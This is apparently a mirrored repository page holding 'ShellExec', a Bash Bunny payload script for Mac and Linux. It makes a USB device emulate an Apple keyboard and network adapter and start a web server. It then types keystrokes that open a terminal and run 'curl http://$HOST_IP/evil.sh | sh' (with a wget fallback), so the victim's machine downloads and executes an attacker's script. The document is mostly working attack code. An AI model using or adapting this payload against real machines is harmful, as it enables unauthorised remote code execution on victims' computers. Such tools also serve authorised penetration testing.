mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
55 lines
1.1 KiB
Bash
55 lines
1.1 KiB
Bash
#!/bin/bash
|
|
|
|
# Title: ShellExec
|
|
# Author: audibleblink
|
|
# Target: Mac/Linux
|
|
# Version: 1.0
|
|
#
|
|
# Create a web server on the BashBunny and forces
|
|
# the victim download and execute a script.
|
|
#
|
|
# White | Ready
|
|
# Ammber blinking | Waiting for server
|
|
# Blue blinking | Attacking
|
|
# Green | Finished
|
|
|
|
LED R G B
|
|
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
|
|
|
source bunny_helpers.sh
|
|
|
|
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
|
|
log_file=$payload_dir/shellexec.log
|
|
|
|
cd $payload_dir
|
|
|
|
# starting server
|
|
LED R G 500
|
|
|
|
# disallow outgoing dns requests so server starts immediately
|
|
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
|
python -m SimpleHTTPServer 80
|
|
|
|
# wait until port is listening
|
|
while ! nc -z localhost 80; do sleep 0.2; done
|
|
|
|
# attack commences
|
|
LED B 500
|
|
|
|
Q GUI SPACE
|
|
Q DELAY 300
|
|
Q STRING terminal
|
|
Q DELAY 100
|
|
Q ENTER
|
|
Q DELAY 2000
|
|
|
|
# Q ALT F2 # swap with block above for linux
|
|
# Q DELAY 100
|
|
|
|
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
|
|
# in case curl isn't installed
|
|
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
|
|
Q ENTER
|
|
|
|
LED G
|